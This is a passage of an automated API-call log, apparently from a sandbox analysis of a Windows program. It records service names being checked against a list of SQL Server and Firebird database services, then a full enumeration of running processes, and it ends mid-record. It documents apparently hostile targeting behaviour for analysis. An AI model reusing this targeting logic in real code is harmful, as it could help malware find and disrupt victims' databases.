[0201.567] lstrcmpiW (lpString1="mssqlserver", lpString2="NcbService") returned -1 [0201.567] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="NcbService") returned 1 [0201.567] lstrlenW (lpString="netprofm") returned 8 [0201.567] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="netprofm") returned -1 [0201.567] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="netprofm") returned -1 [0201.567] lstrcmpiW (lpString1="sqlwriter", lpString2="netprofm") returned 1 [0201.567] lstrcmpiW (lpString1="mssqlserver", lpString2="netprofm") returned -1 [0201.567] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="netprofm") returned 1 [0201.567] lstrlenW (lpString="NlaSvc") returned 6 [0201.567] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="NlaSvc") returned -1 [0201.567] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="NlaSvc") returned -1 [0201.567] lstrcmpiW (lpString1="sqlwriter", lpString2="NlaSvc") returned 1 [0201.567] lstrcmpiW (lpString1="mssqlserver", lpString2="NlaSvc") returned -1 [0201.567] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="NlaSvc") returned 1 [0201.567] lstrlenW (lpString="nsi") returned 3 [0201.567] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="nsi") returned -1 [0201.567] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="nsi") returned -1 [0201.567] lstrcmpiW (lpString1="sqlwriter", lpString2="nsi") returned 1 [0201.567] lstrcmpiW (lpString1="mssqlserver", lpString2="nsi") returned -1 [0201.567] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="nsi") returned 1 [0201.568] lstrlenW (lpString="PcaSvc") returned 6 [0201.568] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="PcaSvc") returned -1 [0201.568] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="PcaSvc") returned -1 [0201.568] lstrcmpiW (lpString1="sqlwriter", lpString2="PcaSvc") returned 1 [0201.568] lstrcmpiW (lpString1="mssqlserver", lpString2="PcaSvc") returned -1 [0201.568] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="PcaSvc") returned 1 [0201.568] lstrlenW (lpString="PlugPlay") returned 8 [0201.568] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="PlugPlay") returned -1 [0201.568] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="PlugPlay") returned -1 [0201.568] lstrcmpiW (lpString1="sqlwriter", lpString2="PlugPlay") returned 1 [0201.568] lstrcmpiW (lpString1="mssqlserver", lpString2="PlugPlay") returned -1 [0201.568] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="PlugPlay") returned 1 [0201.568] lstrlenW (lpString="Power") returned 5 [0201.568] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Power") returned -1 [0201.568] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Power") returned -1 [0201.568] lstrcmpiW (lpString1="sqlwriter", lpString2="Power") returned 1 [0201.568] lstrcmpiW (lpString1="mssqlserver", lpString2="Power") returned -1 [0201.568] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Power") returned 1 [0201.568] lstrlenW (lpString="ProfSvc") returned 7 [0201.568] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="ProfSvc") returned -1 [0201.568] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="ProfSvc") returned -1 [0201.568] lstrcmpiW (lpString1="sqlwriter", lpString2="ProfSvc") returned 1 [0201.568] lstrcmpiW (lpString1="mssqlserver", lpString2="ProfSvc") returned -1 [0201.568] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="ProfSvc") returned 1 [0201.568] lstrlenW (lpString="RpcEptMapper") returned 12 [0201.568] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="RpcEptMapper") returned -1 [0201.568] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="RpcEptMapper") returned -1 [0201.568] lstrcmpiW (lpString1="sqlwriter", lpString2="RpcEptMapper") returned 1 [0201.568] lstrcmpiW (lpString1="mssqlserver", lpString2="RpcEptMapper") returned -1 [0201.568] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="RpcEptMapper") returned 1 [0201.569] lstrlenW (lpString="RpcSs") returned 5 [0201.569] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="RpcSs") returned -1 [0201.569] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="RpcSs") returned -1 [0201.569] lstrcmpiW (lpString1="sqlwriter", lpString2="RpcSs") returned 1 [0201.569] lstrcmpiW (lpString1="mssqlserver", lpString2="RpcSs") returned -1 [0201.569] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="RpcSs") returned 1 [0201.569] lstrlenW (lpString="SamSs") returned 5 [0201.569] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="SamSs") returned -1 [0201.569] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="SamSs") returned -1 [0201.569] lstrcmpiW (lpString1="sqlwriter", lpString2="SamSs") returned 1 [0201.569] lstrcmpiW (lpString1="mssqlserver", lpString2="SamSs") returned -1 [0201.569] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="SamSs") returned 1 [0201.569] lstrlenW (lpString="Schedule") returned 8 [0201.569] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Schedule") returned -1 [0201.569] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Schedule") returned -1 [0201.569] lstrcmpiW (lpString1="sqlwriter", lpString2="Schedule") returned 1 [0201.569] lstrcmpiW (lpString1="mssqlserver", lpString2="Schedule") returned -1 [0201.569] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Schedule") returned 1 [0201.569] lstrlenW (lpString="SecurityHealthService") returned 21 [0201.569] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="SecurityHealthService") returned -1 [0201.569] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="SecurityHealthService") returned -1 [0201.569] lstrcmpiW (lpString1="sqlwriter", lpString2="SecurityHealthService") returned 1 [0201.569] lstrcmpiW (lpString1="mssqlserver", lpString2="SecurityHealthService") returned -1 [0201.569] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="SecurityHealthService") returned 1 [0201.569] lstrlenW (lpString="SENS") returned 4 [0201.569] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="SENS") returned -1 [0201.569] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="SENS") returned -1 [0201.569] lstrcmpiW (lpString1="sqlwriter", lpString2="SENS") returned 1 [0201.569] lstrcmpiW (lpString1="mssqlserver", lpString2="SENS") returned -1 [0201.569] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="SENS") returned 1 [0201.570] lstrlenW (lpString="ShellHWDetection") returned 16 [0201.570] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="ShellHWDetection") returned -1 [0201.570] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="ShellHWDetection") returned -1 [0201.570] lstrcmpiW (lpString1="sqlwriter", lpString2="ShellHWDetection") returned 1 [0201.570] lstrcmpiW (lpString1="mssqlserver", lpString2="ShellHWDetection") returned -1 [0201.570] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="ShellHWDetection") returned 1 [0201.570] lstrlenW (lpString="Spooler") returned 7 [0201.570] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Spooler") returned -1 [0201.570] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Spooler") returned -1 [0201.570] lstrcmpiW (lpString1="sqlwriter", lpString2="Spooler") returned 1 [0201.570] lstrcmpiW (lpString1="mssqlserver", lpString2="Spooler") returned -1 [0201.570] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Spooler") returned 1 [0201.570] lstrlenW (lpString="sppsvc") returned 6 [0201.570] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="sppsvc") returned -1 [0201.570] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="sppsvc") returned -1 [0201.570] lstrcmpiW (lpString1="sqlwriter", lpString2="sppsvc") returned 1 [0201.570] lstrcmpiW (lpString1="mssqlserver", lpString2="sppsvc") returned -1 [0201.570] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="sppsvc") returned 1 [0201.570] lstrlenW (lpString="SSDPSRV") returned 7 [0201.570] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="SSDPSRV") returned -1 [0201.570] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="SSDPSRV") returned -1 [0201.570] lstrcmpiW (lpString1="sqlwriter", lpString2="SSDPSRV") returned -1 [0201.570] lstrcmpiW (lpString1="mssqlserver", lpString2="SSDPSRV") returned -1 [0201.570] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x40c [0201.575] Process32FirstW (in: hSnapshot=0x40c, lppe=0x291fd2c | out: lppe=0x291fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0201.576] Process32NextW (in: hSnapshot=0x40c, lppe=0x291fd2c | out: lppe=0x291fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6e, th32ParentProcessID=0x0, pcPriClassBase=8, dwFlags=0x0, szExeFile="System")) returned 1 [0201.759] lstrlenW (lpString="System") returned 6 [0201.759] Process32NextW (in: hSnapshot=0x40c, lppe=0x291fd2c | out: lppe=0x291fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x144, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x4, pcPriClassBase=11, dwFlags=0x0, szExeFile="smss.exe")) returned 1 [0201.760] lstrlenW (lpString="smss.exe") returned 8 [0201.760] Process32NextW (in: hSnapshot=0x40c, lppe=0x291fd2c | out: lppe=0x291fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x19c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x194, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0201.761] lstrlenW (lpString="csrss.exe") returned 9 [0201.761] Process32NextW (in: hSnapshot=0x40c, lppe=0x291fd2c | out: lppe=0x291fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1ec, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x194, pcPriClassBase=13, dwFlags=0x0, szExeFile="wininit.exe")) returned 1 [0201.761] lstrlenW (lpString="wininit.exe") returned 11 [0201.761] Process32NextW (in: hSnapshot=0x40c, lppe=0x291fd2c | out: lppe=0x291fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1f8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x1e4, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0201.762] lstrlenW (lpString="csrss.exe") returned 9 [0201.762] Process32NextW (in: hSnapshot=0x40c, lppe=0x291fd2c | out: lppe=0x291fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x234, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x1e4, pcPriClassBase=13, dwFlags=0x0, szExeFile="winlogon.exe")) returned 1 [0201.763] lstrlenW (lpString="winlogon.exe") returned 12 [0201.763] Process32NextW (in: hSnapshot=0x40c, lppe=0x291fd2c | out: lppe=0x291fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x250, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xe, th32ParentProcessID=0x1ec, pcPriClassBase=9, dwFlags=0x0, szExeFile="services.exe")) returned 1 [0201.764] lstrlenW (lpString="services.exe") returned 12 [0201.764] Process32NextW (in: hSnapshot=0x40c, lppe=0x291fd2c | out: lppe=0x291fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x258, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x1ec, pcPriClassBase=9, dwFlags=0x0, szExeFile="lsass.exe")) returned 1 [0201.764] lstrlenW (lpString="lsass.exe") returned 9 [0201.764] Process32NextW (in: hSnapshot=0x40c, lppe=0x291fd2c | out: lppe=0x291fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x2b4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x16, th32ParentProcessID=0x250, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0201.765] lstrlenW (lpString="svchost.exe") returned 11 [0201.765] Process32NextW (in: hSnapshot=0x40c, lppe=0x291fd2c | out: lppe=0x291fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x2c0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x234, pcPriClassBase=8, dwFlags=0x0, szExeFile="fontdrvhost.exe")) returned 1 [0201.766] lstrlenW (lpString="fontdrvhost.exe") returned 15 [0201.766] Process32NextW (in: hSnapshot=0x40c, lppe=0x291fd2c | out: lppe=0x291fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x2c8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x1ec, pcPriClassBase=8, dwFlags=0x0, szExeFile="fontdrvhost.exe")) returned 1 [0201.767] lstrlenW (lpString="fontdrvhost.exe") returned 15 [0201.767] Process32NextW (in: hSnapshot=0x40c, lppe=0x291fd2c | out: lppe=0x291fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x318, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xf, th32ParentProcessID=0x250, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0201.784] lstrlenW (lpString="svchost.exe") returned 11 [0201.784] Process32NextW (in: hSnapshot=0x40c, lppe=0x291fd2c | out: lppe=0x291fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x374, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x234, pcPriClassBase=13, dwFlags=0x0, szExeFile="dwm.exe")) returned 1 [0201.785] lstrlenW (lpString="dwm.exe") returned 7 [0201.785] Process32NextW (in: hSnapshot=0x40c, lppe=0x291fd2c | out: lppe=0x291fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x3c0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5c, th32ParentProcessID=0x250, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0201.785] lstrlenW (lpString="svchost.exe") returned 11 [0201.785] Process32NextW (in: hSnapshot=0x40c, lppe=0x291fd2c | out: lppe=0x291fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x3d0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1b, th32ParentProcessID=0x250, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0201.786] lstrlenW (lpString="svchost.exe") returned 11 [0201.786] Process32NextW (in: hSnapshot=0x40c, lppe=0x291fd2c | out: lppe=0x291fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x3f4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x19, th32ParentProcessID=0x250, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0201.787] lstrlenW (lpString="svchost.exe") returned 11 [0201.787] Process32NextW (in: hSnapshot=0x40c, lppe=0x291fd2c | out: lppe=0x291fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x12c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x10, th32ParentProcessID=0x250, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0201.788] lstrlenW (lpString="svchost.exe") returned 11 [0201.788] Process32NextW (in: hSnapshot=0x40c, lppe=0x291fd2c | out: lppe=0x291fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x170, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x24, th32ParentProcessID=0x250, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0201.788] lstrlenW (lpString="svchost.exe") returned 11 [0201.788] Process32NextW (in: hSnapshot=0x40c, lppe=0x291fd2c | out: lppe=0x291fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x480, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1b, th32ParentProcessID=0x250, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0201.789] lstrlenW (lpString="svchost.exe") returned 11 [0201.789] Process32NextW (in: hSnapshot=0x40c, lppe=0x291fd2c | out: lppe=0x291fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4fc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x250, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0201.790] lstrlenW (lpString="svchost.exe") returned 11 [0201.790] Process32NextW (in: hSnapshot=0x40c, lppe=0x291fd2c | out: lppe=0x291fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x530, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x250, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0201.804] lstrlenW (lpString="svchost.exe") returned 11 [0201.804] Process32NextW (in: hSnapshot=0x40c, lppe=0x291fd2c | out: lppe=0x291fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x538, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x250, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0201.805] lstrlenW (lpString="svchost.exe") returned 11 [0201.805] Process32NextW (in: hSnapshot=0x40c, lppe=0x291fd2c | out: lppe=0x291fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x5c4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xc, th32ParentProcessID=0x250, pcPriClassBase=8, dwFlags=0x0, szExeFile="spoolsv.exe")) returned 1 [0201.805] lstrlenW (lpString="spoolsv.exe") returned 11 [0201.805] Process32NextW (in: hSnapshot=0x40c, lppe=0x291fd2c | out: lppe=0x291fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x5f0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x250, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0201.806] lstrlenW (lpString="svchost.exe") returned 11 [0201.806] Process32NextW (in: hSnapshot=0x40c, lppe=0x291fd2c | out: lppe=0x291fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x684, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x250, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0201.807] lstrlenW (lpString="svchost.exe") returned 11 [0201.807] Process32NextW (in: hSnapshot=0x40c, lppe=0x291fd2c | out: lppe=0x291fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x6a4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x4fc, pcPriClassBase=8, dwFlags=0x0, szExeFile="audiodg.exe")) returned 1 [0201.807] lstrlenW (lpString="audiodg.exe") returned 11 [0201.807] Process32NextW (in: hSnapshot=0x40c, lppe=0x291fd2c | out: lppe=0x291fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x6fc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xf, th32ParentProcessID=0x3c0, pcPriClassBase=8, dwFlags=0x0, szExeFile="sihost.exe")) returned 1 [0201.808] lstrlenW (lpString="sihost.exe") returned 10 [0201.808] Process32NextW (in: hSnapshot=0x40c, lppe=0x291fd2c | out: lppe=0x291fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x718, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xf, th32ParentProcessID=0x250, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0201.809] lstrlenW (lpString="svchost.exe") returned 11 [0201.809] Process32NextW (in: hSnapshot=0x40c, lppe=0x291fd2c | out: lppe=0x291fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x7ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xf, th32ParentProcessID=0x3c0, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhostw.exe")) returned 1 [0201.810] lstrlenW (lpString="taskhostw.exe") returned 13 [0201.810] Process32NextW (in: hSnapshot=0x40c, lppe=0x291fd2c | out: lppe=0x291fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x7f4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x13, th32ParentProcessID=0x250, pcPriClassBase=8, dwFlags=0x0, szExeFile="OfficeClickToRun.exe")) returned 1 [0201.810] lstrlenW (lpString="OfficeClickToRun.exe") returned 20 [0201.810] Process32NextW (in: hSnapshot=0x40c, lppe=0x291fd2c | out: lppe=0x291fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x55c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x250, pcPriClassBase=8, dwFlags=0x0, szExeFile="SecurityHealthService.exe")) returned 1 [0201.812] lstrlenW (lpString="SecurityHealthService.exe") returned 25 [0201.812] Process32NextW (in: hSnapshot=0x40c, lppe=0x291fd2c | out: lppe=0x291fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x860, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x39, th32ParentProcessID=0x834, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0201.813] lstrlenW (lpString="explorer.exe") returned 12 [0201.813] Process32NextW (in: hSnapshot=0x40c, lppe=0x291fd2c | out: lppe=0x291fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x8bc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xe, th32ParentProcessID=0x4, pcPriClassBase=8, dwFlags=0x0, szExeFile="Memory Compression")) returned 1 [0201.813] lstrlenW (lpString="Memory Compression") returned 18 [0201.813] Process32NextW (in: hSnapshot=0x40c, lppe=0x291fd2c | out: lppe=0x291fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xb50, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1b, th32ParentProcessID=0x2b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="ShellExperienceHost.exe")) returned 1 [0201.814] lstrlenW (lpString="ShellExperienceHost.exe") returned 23 [0201.814] Process32NextW (in: hSnapshot=0x40c, lppe=0x291fd2c | out: lppe=0x291fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xb58, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1c, th32ParentProcessID=0x2b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="SearchUI.exe")) returned 1 [0201.815] lstrlenW (lpString="SearchUI.exe") returned 12 [0201.815] Process32NextW (in: hSnapshot=0x40c, lppe=0x291fd2c | out: lppe=0x291fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xbf4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x2b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="RuntimeBroker.exe")) returned 1 [0201.816] lstrlenW (lpString="RuntimeBroker.exe") returned 17 [0201.816] Process32NextW (in: hSnapshot=0x40c, lppe=0x291fd2c | out: lppe=0x291fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xe04, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x2b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1 [0201.816] lstrlenW (lpString="WmiPrvSE.exe") returned 12 [0201.816] Process32NextW (in: hSnapshot=0x40c, lppe=0x291fd2c | out: lppe=0x291fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x9c0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x3c0, pcPriClassBase=6, dwFlags=0x0, szExeFile="DeviceCensus.exe")) returned 1 [0201.817] lstrlenW (lpString="DeviceCensus.exe") returned 16 [0201.817] Process32NextW (in: hSnapshot=0x40c, lppe=0x291fd2c | out: lppe=0x291fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4c4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x3c0, pcPriClassBase=6, dwFlags=0x0, szExeFile="UNPCampaignManager.exe")) returned 1 [0201.818] lstrlenW (lpString="UNPCampaignManager.exe") returned 22 [0201.818] Process32NextW (in: hSnapshot=0x40c, lppe=0x291fd2c | out: lppe=0x291fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x368, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x9c0, pcPriClassBase=6, dwFlags=0x0, szExeFile="conhost.exe")) returned 1 [0201.819] lstrlenW (lpString="conhost.exe") returned 11 [0201.819] Process32NextW (in: hSnapshot=0x40c, lppe=0x291fd2c | out: lppe=0x291fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xd24, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x860, pcPriClassBase=8, dwFlags=0x0, szExeFile="roof competitive.exe")) returned 1 [0201.820] lstrlenW (lpString="roof competitive.exe") returned 20 [0201.820] Process32NextW (in: hSnapshot=0x40c, lppe=0x291fd2c | out: lppe=0x291fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xd60, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x860, pcPriClassBase=8, dwFlags=0x0, szExeFile="trustees.exe")) returned 1 [0201.820] lstrlenW (lpString="trustees.exe") returned 12 [0201.820] Process32NextW (in: hSnapshot=0x40c, lppe=0x291fd2c | out: lppe=0x291fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xd68, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x860, pcPriClassBase=8, dwFlags=0x0, szExeFile="retailerssoleanxiety.exe")) returned 1 [0201.821] lstrlenW (lpString="retailerssoleanxiety.exe") returned 24 [0201.821] Process32NextW (in: hSnapshot=0x40c, lppe=0x291fd2c | out: lppe=0x291fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xd70, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x860, pcPriClassBase=8, dwFlags=0x0, szExeFile="isbn.exe")) returned 1 [0201.822] lstrlenW (lpString="isbn.exe") returned 8 [0201.822] Process32NextW (in: hSnapshot=0x40c, lppe=0x291fd2c | out: lppe=0x291fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xd14, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x860, pcPriClassBase=8, dwFlags=0x0, szExeFile="sega_danger_verse.exe")) returned 1 [0201.823] lstrlenW (lpString="sega_danger_verse.exe") returned 21 [0201.823] Process32NextW (in: hSnapshot=0x40c, lppe=0x291fd2c | out: lppe=0x291fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xdc8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x860, pcPriClassBase=8, dwFlags=0x0, szExeFile="tabs_dimensions.exe")) returned 1 [0201.823] lstrlenW (lpString="tabs_dimensions.exe") returned 19 [0201.823] Process32NextW (in: hSnapshot=0x40c, lppe=0x291fd2c | out: lppe=0x291fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x668, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x860, pcPriClassBase=8, dwFlags=0x0, szExeFile="concerts_input_maybe.exe")) returned 1 [0201.824] lstrlenW (lpString="concerts_input_maybe.exe") returned 24 [0201.824] Process32NextW (in: hSnapshot=0x40c, lppe=0x291fd2c | out: lppe=0x291fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x7fc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x860, pcPriClassBase=8, dwFlags=0x0, szExeFile="nearby-installations-wise.exe")) returned 1 [0201.825] lstrlenW (lpString="nearby-installations-wise.exe") returned 29 [0201.825] Process32NextW (in: hSnapshot=0x40c, lppe=0x291fd2c | out: lppe=0x291fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x2d4, 